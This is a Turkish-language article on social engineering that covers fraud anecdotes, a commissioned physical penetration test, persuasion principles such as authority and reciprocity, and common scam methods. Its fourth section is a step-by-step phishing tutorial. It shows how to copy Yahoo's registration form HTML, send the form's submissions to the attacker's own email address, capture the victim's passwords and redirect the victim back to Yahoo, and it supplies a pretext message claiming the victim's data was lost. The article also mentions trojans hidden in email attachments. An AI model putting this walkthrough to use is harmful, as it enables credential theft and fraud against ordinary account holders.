Notes

Sosyal Mühendislik

1- GERÇEK HİKAYELER:

Adı bilinmeyen bir kişi telefonla aradığı bir bayana,kendisinin yerel bir şirketin müşteri hizmetlerinden olduğunu ve yaptıkları yerel bir hata yüzünden kredi kart bilgilerinin ve sosyal güvenlik numaralarının silindiğini söyler.

Bu kişi sözkonusu kişiden İsim ve soy ismini, adresini, kredi kart numarasını, sosyal güvenlik numarası gibi bilgilerini alır. Bu olay üzerinden 20 gün gibi bir süre geçtikten sonra o kişiye gelen 2500 dolarlık faturanın detayları şöyledir;

1 diz üstü bilgisayar,3 mp3 çalar ve 2 dvd oynatıcı.

Elbette ki tüm hackerların her zaman bilgisayar başında ,açıkları bulunan servisleri sömürme yoluyla kredi kartı numarası gibi özel bilgilere ulaştıkları söylenemez.

Bazen hackerlar ın tüm yaptığı bir insanı telefonla arayarak onun aptallığını sömürmektir.

24 farklı güvenlik acentesinde güvenlik test emri bulunan ABD genel hesap ofisi baş teknoloji uzmanı Keith A. Rhodes e göre bir şebekeye girebilmek ve sömürebilmek için her zaman mevcut bir yol vardır ya da bulunabilir fakat bazen insanların arasına karısarak ve onları kandırarak onların kendi güvenliklerini tehlikeye atmalarını sağlamak daha kolaydır.

MCommerce güvenliğinde görevli bir güvenlik uzmanı olan Kapil Raina tarafından; Yeni Başlayanın rehberi :

Önceki bir işverenle asıl işyeri tecrübesi temelli.

Hikaye şöyledir;

Bundan bir kaç yıl önce bir sabah bir grup yabancı büyük bir ticaret filosu firmasına yürüyerek girerler ve filonun tüm mali bilgilerini tamamen ele geçirdiler. Bunu nasıl yapmışlardı ? Firmanın bir kaç farklı çalışanının numarasıyla azar azar erişimin küçük miktarlarını elde ederek yapmışlardı.

Öncelikle şirkete ayak basışlarından 2 gün kadar önce şirket hakkında ön araştırma yapmışlardı.

Örneğin ön kapıda sanki anahtarlarını kaybetmiş gibi numara yaptılar ve bir adam onların içeri girmelerine izin verdi. Daha sonra 3. güvenlikli kapıyı geçmek için gülümseyerek kimlik rozetlerini kaybettiklerine inandırdırdıkları görevliye kapıyı açtırmayı başardılar.

Bu yabancılar CFO şirketinin şehir dışında olduğunu bildiklerinden ofise rahatlıkla girerek şirket bilgisayarlarındaki tüm mali veriyi elde ettiler. Çöp karıstırırcasına tüm faydalı dökümanları aradılar ve buldular. Ve daha sonra buldukları dökümanları kapıcıdan istedikleri çöp kutusunun içine saklayarak tüm veriyi bina dısına cıkardılar.

Bu yabancılar aslında CFO şirketi için bir güvenlik denetimi yapmak üzere tüm bunları tasarlamış olan ve şirket adına çaılşan güvenlik uzmanlarıydılar ve şirket çalışanlarını sosyal mühendislik sayesinde kandırmayı başarmışlardı.

2-TANIM

Sosyal mühendisliğin temel amaçları hakkında bir çok makale okumuş biri olarak hackerlar tarafından bir çok farklı yollarla kullanılan Sosyal Mühendiliğin basitçe tanımını şöyle yapabilirim;

Sahtekarlık ve casusluk yapabilmek için direk bir insana karşı bazı ikna özelliklerinin kullanılarak ya da bir sistem ya da şebekeye direk erişmek olarak tanımlanabilir.

Hedefler;ticari şirketler,mali ve kültürel kurumlar,hastaneler oalbilirken kimi zamanda basit bir yahoo hesabı olabilir.

3-İKNA VE ETKİ TEKNİKLERİ

OTORİTE:

Sosyal psikoloji edebiyatı açısından bir kişiyi ikna etmek ya da etkileyebilmek için çevresel şartlarında önemli olduğu bir durumda 6 muhtemel faktör olduğu varsayılır.

3 Midwestern Hastanesinde yapılan bir çalışma göstermiştir ki insanlar otoriter konumdaki kişiliklerin sorularına daha kolay ve rahat yanıt vermekte otoriter kişiler insanları daha kolay etkileyebilmektedirler.

Yapılan çalışmada 22 ayrı hemşirenin bulunduğu hastanede kendisini doktor olarak tanıtan bir kişi hemşirelere koğuşta bulunan özel bir hastaya 20 miligramlık özel bir dozajda günde 2 kez ilaç verilmesini söyler.

Hemşireler daha önce hiç görmedikleri ve konusmadıkları bu kişinin kendisini doktor olarak tanıtmasından dolayı herhangi bir şüpheye düşmemişlerdir.

Olayların %95 inde doktorun belirttiği dozun cok tehlikeli olduğunu bildikleri halde hemşireler koğuş ilaç kabininden zorunlu-sözde doktorun-belirttiği ilaç miktarını almaya devam etmişlerdir. Tabi daha sonra gözlemciler tarafından hemşirelere olay açıklanmıştır.

KITLIK:

İnsanlar bir dönem boyunca az ya da sınırlı olan özel bir madde söz konusu olduğunda göstergelere yüksek ölçüde yanıt vermektedirler.

Doktor Jack Brehm in Stanford Üniversitesinde yaptığı araştırmaya göre insanların özgürlüğünü elinden alan ya da kısıtlayan bu durumlarda kişinin madde üzerindeki ilgisi daha fazla artmakta ve aşırı bil hal almaktadır.

Hatta araştımalar göstermiştir ki maddenin kısa süreli tedarik edilmesi sonucunda maddeye olan ihtiyaç ve istek daha da artmaktadır.

BEĞENME VE BENZERLİK:

Aynı karakteristik özelliklere sahip yada benzer spor,müzik,sanat eğilimleri bulunan ve doğum yerleri aynı olan kişilerin birbirini etkilemesi ve teşvik etmesi daha kolay olmustur.

KARŞILIK VERME:

İyi bir sosyal iletişim kuralının gerektirdiği gibi herhangi bir kişi bize bir şey verirse biz de kendimizi ona bir şey verme zorunlulugu hissederiz; öyle ki kişi istediği herhangi bir şeyi karşı taraftan istemeden,karşı taraf kendiliğiden iyiliği yaparsa kuşkusuz yardım edilen kişi-iyiliğin karşılıklı olduğu kuralına riayet etmek için- iyiliğin karşılığını vermekte daha kuvvetli bir yükümlülük hisseder.

TAAHHÜT VE TUTARLILIK:

Kişinin toplum içindeki yerini belirleyen en büyük unsurlardan bir tanesi tutarlılıktır. Eğer biz,verdiğimiz bir sözü tutmaz yada yapacağımızı söylediğimiz bir olayı gerçekleştirmekte başarısız olursak toplum içinde neredeyse tamamen güvenilmeyen ya da istemenyen bir kişi pozisyonuna düşebiliriz. İşte bu yüzden sözlerimizin arkasında durabilmek için bu yolda oynayabilmek için büyük acılar çekilecek olsa bile bunları göze almalıyız. Aradan uzun zaman geçtiğinde tutarlılık adına yaptıklarımızn gerçekten akılsızlık gibi görünse bile.

Sosyal Geleneğin ve pratiğin bizleri kişinin tutarlılığına inandırdığı yollardan birisi,kişinin -yazma- işini nasıl kullandığıdır.

Sosyal Psikolog Robert Cialdini’ye göre -aksini ispat eden bir kanıt yoksa- insanlar kendilerine söylenen bir cümlenin söyleyen kişinin gerçek görüşü olduğuna inanmaya eğilimlidirler. Üstelik eğer kişi cümlesini kendi kelimeleriyle yazmışsa buna ek olarak bu cümlelerini bir mektup,bir e-posta yada yeminli bir ifade şeklinde ve kendi inançları ve görüşlerini de ekleyerek yazıp yollamışsa karşısındakini etkileme şansı daha fazladır.

SOSYAL KANIT:

Bir çok sosyal durum karşısında neyin uygun olup olmadığını kararlaştırmamızda bizim güvendiğimiz kısa yollardan biri çevremizdeki insanları izleyerek onların ne yaptıklarını ya da bir durum karşısında ne diyeceklerini düşünmemizdir. Bu sosyal kanıt olarak bilinen olguya göre yapacağımız üzerinde fazla düşünmeden harekete geçtiğmiz için kimi zaman bu hareketler bizim kişisel çıkarlarımıza ters düşebilir.

4-HACKER LARIN KULLANDIĞI BAZI YÖNTEMLER:

İnternet Sahtekarlığı Adına Bazı Online Uygulamalar

E-Posta Parolaları Ve Kredi Kartı Numaraları

Şimdi bu kısımda sizlere açgözlülüğün etkilerinden bahsedeceğim. Düşünün ki kurban kendisine gelen Mercedes-2003 veya 10 bin dolar teklif eden kendisinin kullanıcı adını ve parolasını almaya yönelik düzenlenen hatta kimi zaman kredi kartı numarasını ya da sosyal güvenlik numarasını talep eden bir e-postayı istenilen bilgileri yazarak cevaplıyor.

Bu teknik çoğunlukla kullanıcıların kredi kartlarını ya da e-posta bilgilerini hedef alır.

Bir diğer bilinen klasik tuzaklardan biri müşterilere bir hata dolayısıyla silinen isim, soyisim, parolaların, doğum tarihi ve gizli sorunun cevabı kim bilgierin kurbana kayıt formu şeklinde gönderilerek bu bilgilerin ele geçirilmesi metodudur.

Mutlaka ki hacker ın iyi bir html, java ya da php programcısı olmasına saatlerini harcayarak html kodlaması yapmasına gerek yoktur.

Sadece ihtiyacı olan,kurbanı inandırabileceği ve e-posta yı cevaplatarak bilgileri elde edeceği bu formu oluşturabilmektir.

Herşeyden önce eminim ki çoğunuz bir html formunun nasıl çalıştığını biliyorsunuz.

Şimdi 5 dakikadan az bir sürede nasıl html formu yapıldığını görelim.

Evet, diyelim ki bir yahoo hesabının parolasıyla ilgileniyoruz. Hacker öncelikle saldırının etki biçimini ve otorite etkisini belirlemelidir. İlk olarak yahoo mail sayfasına girerek kişinin formu kayıt formu doldururken neler yazabileceğini düşünür ve bunları dener.


( http://edit.yahoo.com/config/eval_register?

.v=&.intl=&new=1&.done=&.src=ym&.partner=&.

p=&promo=&.last=so)

yukarıda ki formumuz ve ihtiyacımız olan bir kaç öğeyi değiştirmektir.

2.Adımda sayfanın html kaynağını almaktır. Çünkü üzerinde değişiklik yapacağız. Aldığımızda tek yapmamız gereken -silmek- olacak.

(<FORM name=IOS onsubmit="return hash(this)"

action=https://edit.yahoo.com/config/register)

Yahoo web script ile veriyi işleme koyduktan sonra bilgileri kendi scriptimizde http adres yerine yazıp yolladıktan sonra aşağıda kalan verileri sileceğiz.

<INPUT type=hidden

value=1 name=.save> <INPUT type=hidden value=0 name=.accept> <INPUT type=hidden

name=.demog> <INPUT type=hidden name=.done> <INPUT type=hidden name=.fam> <INPUT

type=hidden name=.i> <INPUT type=hidden name=.last> <INPUT type=hidden value=ym

name=.src> <INPUT type=hidden value=0 name=.regattempts> <INPUT type=hidden

name=.partner> <INPUT type=hidden name=promo> <INPUT type=hidden name=.ignore>

<INPUT type=hidden name=.pwtoken> <INPUT type=hidden value=ets8ig8vfdqbg

name=.u> <INPUT type=hidden value=1 name=.v> <INPUT type=hidden name=.md5>

<INPUT type=password maxLength=32 name=.pw <INPUT type=password maxLength=32 name=.pw2

Evet şimdi formu değiştirdik ve ihtiyacımız olan küçük bir php perl scripti oluşturmak bunu 2 şekilde yapabiliriz hazır bir perl scripti yükleyerek uygun bir server a yerleştirmek ya da hacker in metin ismini bildiğini varsayarak bir arama motoru yoluyla scripti bulması olacaktır.

Ve şimdi gerekli herşeye sahibiz;

Bu hacker ın e-posta bilgileridir-verinin dönüş yapacağı yer-

<input type=hidden name="recipient" value=" [email protected]">

Bu mailin konusu;

<input type=hidden name="subject" value="Successfully hacked">

Gerçekten çok ihtiyaç olmasa da kurbanın ıp adresi ve host ismi;

<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT,REMOTE_ADDR">

Bu da kurban formu doldurduktan sonra ağ posta metninin yönleneceği yer;

<INPUT TYPE="HIDDEN" VALUE=" http://mail.yahoo.com" NAME="redirect">

En önemlisi,kurbanın şifre bilgileri;

<INPUT type=password maxLength=32 name="passwd"

<INPUT type=password maxLength=32 name="passwd2"

Ve son olarak hacker aşağıdaki gibi bir mesaj ekleyebilir.

Veri tabanımızdaki bir hata yüzünden tüm bilgileriniz silinmiştir. Lütfen bir kaç dakikanızı ayırıp aşağıdaki bilgileri doldurunuz.Teşekkürler.

Şimdi geri kalan [email protected] ya da [email protected] gibi bir mail adresi almak.

Kurbanı etkilemeni bir çok yolu vardır.

Html formu yollamak, Truva atlatıyla etkilediği sisteme girmek gibi.

Bunun iyi bir örneği;

Bir hacker konştuğu kişiye arabasının satılık ve oldukça ucuz olduğundan bahseder. Daha sonra kurbana içinde arabanın resminin bulunduğu ekli bir mail yollayarak truva atını kurbanın bilgisayarına bırakır.

İNTERNET ÜZERİNDEN YAPILAN AÇIK ARTTIRMALAR;

Yukarıda bahsettiğimiz 3 psikolojik etkiyi kurban üzerinde oluşturup inanması sağlandıktan sonra üzerinde açık arttırma yapılan malın bedelinin kurbana ödetilmesi sağlanır.

5-SOSYAL MÜHENDİSLİĞİ ÇEVİRMEK:

İstenilen bilgiyi kazanmanın son metodu olarak sosyal mühendisliği çevirmeyi gösterebiliriz.

Yine otoriteyi kullanarak hacker insanların karşısına öyle bir pozisyonda çıkar ki, örneğin bir işyerindeki işçiler herhangi bir iş için tüm plan,uygulama ve analiz durumlarını sosyal mühendisten almaya başlarlar.

6-SON:

Sosyal Mühendisliğin çok çeşitli yolları vardır.

Bunlar e-posta göndererek backdoor oluşturarak yapılabilir.

İnsanların cehalet ve aptallıkları yamanmadığı sürece Sosyal Mühendislik hep etkili olacaktır.